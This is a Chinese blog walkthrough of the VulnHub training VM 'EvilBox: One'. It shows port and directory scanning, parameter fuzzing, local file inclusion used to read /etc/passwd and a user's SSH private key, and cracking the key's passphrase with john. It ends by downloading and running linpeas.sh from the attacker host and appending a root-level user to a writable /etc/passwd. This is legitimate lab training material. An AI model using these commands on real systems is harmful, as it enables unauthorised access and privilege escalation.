vulnhub EvilBox: One

最新推荐文章于 2024-01-20 20:19:34 发布
最新推荐文章于 2024-01-20 20:19:34 发布
阅读量1.6k 收藏 2
点赞数 1
分类专栏: vulnhub 文章标签: ffuf ssh2john openssl id_rsa 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/124416687
版权

渗透思路:

nmap扫描----gobuster爆破网站目录----ffuf爆破url参数----利用本地文件包含找到用户名和id_rsa----ssh2john+john爆破id_rsa的passphrase----linpeas.sh发现/etc/passwd可写----openssl生成新用户密码hash----将root权限新用户写入/etc/passwd----切换到新用户获得root权限

环境信息:

靶机:192.168.101.62

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.62

只扫描到22(ssh)和80(http)端口

2、gobuster爆破网站目录

​gobuster dir -u http://192.168.101.62/ -w /usr/share/wordlists/dirb/big.txt

扫描到/robots.txt和/secret

访问http://192.168.101.62/robots.txt,似乎没什么有用的

访问http://192.168.101.62/secret/,一片空白

继续用gobuster扫描http://192.168.101.62/secret/,用-x参数增加后缀。

下面的命令中其他后缀倒无所谓,.php一定要加

​gobuster dir -u http://192.168.101.62/secret/ -w /usr/share/wordlists/dirb/big.txt -x .txt,.php,.html

扫描到/evil.php

访问http://192.168.101.62/secret/evil.php,页面一片空白,查看网页源代码也啥也没有

3、ffuf爆破url参数

无计可施,只能靠猜了,猜猜evil可能可以动态包含文件,但由于http://192.168.101.62/secret/evil.php没带参数,所以网页上啥也没有。

用ffuf爆破一下http://192.168.101.62/secret/evil.php的参数是什么:

​ffuf -u 'http://192.168.101.62/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fs 0

FUZZ是待爆破的参数的占位符,-fs 0表示过滤长度为0(也就是没有响应体)的响应报文。

爆破出一个可能的参数:command

4、利用本地文件包含找到mowree用户的id_rsa

浏览器访问http://192.168.101.62/secret/evil.php?command=/etc/passwd确认一下

确实可以本地文件包含,而且还返回了/etc/passwd的内容

既然可以本地文件包含,那就看看evil.php里面有没有啥有用的信息。浏览器中访问:

http://192.168.101.62/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=evil.php

得到evil.php的base64编码的代码,拿到CyberChef进行解码,发现没啥有用信息,就两句文件包含的代码

尝试了远程文件包含也不行。

还是好好研究一下/etc/passwd吧,看看什么用户是可以登录的。如果和我一样觉得直接在网页上看着眼花,可以执行一下下面的python脚本,可以分行打印用户信息,再用grep查找结果中包含bash的行就行了

s="root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin"
l=s.split()
for i in l:
    print i

从执行结果可以清晰地看到,除了root还有一个叫mowree的用户是可以登录的

(其实在网页源代码里面直接搜bash也行-_-|||)

利用本地文件包含分别查看/root/.ssh/id_rsa和/home/mowree/.ssh/id_rsa文件的内容。

/root/.ssh/id_rsa查看不到,但/home/mowree/.ssh/id_rsa可以查看到

http://192.168.101.62/secret/evil.php?command=/home/mowree/.ssh/id_rsa

直接看的话格式是乱的,ssh连接的时候格式不对不让连

右键 查看网页源代码,就可以看到格式正确的id_rsa

将网页源代码拷贝,保存为id_rsa

5、ssh2john+john爆破id_rsa的passphrase

这时候如果直接用id_rsa进行ssh连接,会提示id_rsa的文件权限过高,其他用户可以接触到,太危险,所以不让用,还是要输入密码

所以要使用id_rsa进行ssh连接,首先需要修改其权限,比如修改为0600

chmod 0600 id_rsa

然后再进行ssh登录

ssh -i id_rsa mowree@192.168.101.62

还是无法登录,因为id_rsa有passphrase保护,还得先破解出passphrase

接下来先用ssh2john把id_rsa转换成john能识别的格式,再用john爆破passphrase:

先找到ssh2john的位置

locate ssh2john

用ssh2john将id_rsa转换成john能识别的格式,并输出到文件passphrase中

python2 /usr/share/john/ssh2john.py id_rsa > passphrase

可以看一下passphrase的内容

然后用john爆破

john passphrase

得到passphrase为unicorn

此时再进行ssh登录,并将unicorn作为passphrase输入,即可得到mowree用户的shell

mowree的家目录下找到第一个flag

6、/etc/passwd中写入新用户提权

攻击机上linpeas.sh所在目录下开http服务

python2 -m SimpleHTTPServer 8888

靶机上mowree的家目录下,下载linpeas.sh,增加可执行权限,并执行

wget http://192.168.101.34:8888/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

执行结果中有非常明显的提示:/etc/passwd is writable

在攻击机上用openssl生成123的MD5 hash

openssl passwd -1 123

靶机上将新用户fancy写入/etc/passwd文件,口令位置填入刚刚生成的MD5 hash,这样fancy的密码就是123了,剩下的部分全部照抄root用户。

注意:用单引号!!如果用双引号的话,$需要用\进行转义

echo 'fancy:$1$GzuoPPyT$VcrtnMfy8uuezxAZoWAnl1:0:0:root:/root:/bin/bash' >> /etc/passwd

然后执行

su - fancy

输入密码123,即可得到root权限

root目录下得到第2个flag

仙女象
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4208
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
Vulnhub靶机:BOREDHACKERBLOG: SOCIAL NETWORK
tang502的博客
09-24 1199
如果/proc/1/cgroup文件里面可以看到docker,以及docker的hash值。从页面exec()调用命令看出他是python,所以只要建立监听,用python反弹shell。反弹shell工具:https://forum.ywhack.com/shell.php。如果根目录下存在dockerenv,那么有极大的概率,我们是在docker环境中。查看ip,如果ip与网站ip不同,那么有极大的概率,我们是在docker环境中。发现为64的系统,可连接工具Venom,进行docks配置。
vulnhubEvilBox: One
qwweggfe的博客
09-01 1092
文章目录 信息搜集 网页渗透 提权 总结 前言 目前网络安全越来越受到国家的重视,你可以通过本次黑盒的学习,学习到一些关于网络安全的知识,希望对您有所帮助! 提示:以下是本篇文章正文内容,下面案例可供参考 一、信息搜集 首先进行IP扫描 让我们看看看他开启了哪些端口 nmap -sC -sV 192.168.181.157 -p- -v --min-rate=20000 由于80端口打开,于是进行网页访问 于是进行目录扫描 gobuster dir -...
VulnHub日记(十一):EvilBox-One
Dawn_Xi的博客
09-28 1649
靶机介绍 虚拟机链接:EvilBox: One ~ VulnHub 参考博客:EvilBox Writeup - Vulnhub - Walkthrough - Security 开始练习 本机ip:192.168.56.102 虚拟机ip:192.168.56.125 netdiscover查找ip ediscover -r 192.168.56.0/24 nmap扫描开放端口及服务 nmap -A 192.168.56.125 访问80端口并使用dirsearch扫描..
Vulnhub靶机_EVILBOX: ONE
学术渣渣的博客
10-25 628
文章目录靶机信息渗透过程获取靶机IP端口扫描网站目录扫描 靶机信息 下载地址:http://www.vulnhub.com/entry/evilbox-one,736/ 难易程度:简单 渗透过程 获取靶机IP 这个靶机启动后会显示IP地址:192.168.1.103 用主机扫描也可以扫到: arp-scan -l 端口扫描 这里开放了两个端口:22,80。 nmap -A -T4 -p 1-65535 192.168.1.103 网站目录扫描 首先扫描一下特殊文件,这里扫描到一个robots.tx
Vulnhub靶场】EVILBOX: ONE
DG_s1mple
03-24 2491
环境准备 下载靶机后导入到vmware 靶机IP地址为:192.168.2.16 攻击机IP地址为:192.168.2.18 信息收集 使用nmap扫描一下靶机开放的端口信息 只开放了ssh跟http服务 我们访问一下他的网站看看 是最基础的网站,没有什么信息,我们扫描一下 有一个文件夹,我们也去访问一下 是一个空白界面,什么也没有,我们扫描一下这个目录下的文件 有一个php文件,我们也访问一下 也是空的 渗透开始 空的很正常,因为是php代码,所以我们爆破一下是不是有什么参数 发现是文件包
打靶第六周-EvilBox---One
wcwdnmdnmd的博客
04-09 3277
打靶第六周-EvilBox---One
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2483
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3001
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
Vulnhub靶机:DC-6渗透详细过程
IerkeU的博客
03-12 2788
DC-6 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-6,315/ DC-6是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场需要具备初中级的渗透测试技巧,这并不是一个很困难的挑战,因此对初学者来说应该很友好,你的最终目标是放在root目录下的flag。 并且,官方给了一个线索:cat /usr/share/wordlists/rockyou.
靶机渗透练习64-EvilBox:One
hirak0的博客
04-20 2044
靶机描述 靶机地址:https://www.vulnhub.com/entry/evilbox-one,736/ Description Difficulty: Easy This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.62 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建
Vulnhub靶机:EVILBOX_ ONE(很详细)
LainWith的博客
07-08 3058
系列:EvilBox(此系列共1台) 发布日期:2021年08月16日 **难度等级:**低→中 **打靶目标:**取得 root 权限 + 2 Flag 靶机地址:https://www.vulnhub.com/entry/evilbox-one,736/ 涉及攻击方法:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。 打开就是一个ubuntu站点,看不出什么东西,下一步自然是目录扫描了。 常规的dirsearch扫描完毕后,发现
EVILBOX---ONE 打靶流程
qq_53733257的博客
11-24 1043
EVILBOX---ONE 打靶流程
【甄选靶场】 Vulnhub百个项目渗透——项目四十六:bulldog-2(登陆框命令执行,写入用户)
人间体佐菲的博客
10-22 548
【甄选靶场】 Vulnhub百个项目渗透——项目四十六:bulldog-2(登陆框命令执行,写入用户)
kali对未知web server透测试1
热门推荐
信安是不可或缺的一部分!
07-21 4万+
1.打开靶机
Vulnhub靶机:EvilBox-One
最新发布
qq_48904485的博客
01-20 891
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:EvilBox-One(10.0.2.25)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/evilbox-one,736/
利用gobuster对感兴趣的网站进行域名进行探测
dyx0910的博客
05-09 2006
信息搜集工具 DNS信息搜集 gobuster工具使用 工具介绍:主要面向DNS和web目录进行批量探测 工具介绍:主要面向DNS和web目录进行批量探测 安装:apt-get install gobuster 探测模式:dns、dir、vhost、s3、fuzz dns:用于对目标域名、子域名进行探测-v dir:对web目录进行探测、需要字典 vhost:对于虚拟目录进行探测-x s3:对于存储同链接进行探测-x fuzz:模糊...
kali攻击ssh私钥泄露
qq_45034855的博客
09-04 1561
kali攻击ssh私钥泄露 本文章用于记录本人成长过程 靶场机器链接:https://pan.baidu.com/s/19aahB9mQAZz94SxvEexBYg 提取码:4htz 目标:找到三个flag值: flag1{make_america_great_again} flag2{use_the_source_luke} lag3{das_bof_meister} ①:打开终端,使用nmap...
网站后台爆破工具:WebCrack
zxのdream
10-30 3万+
webcrack 网站后台爆破工具
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值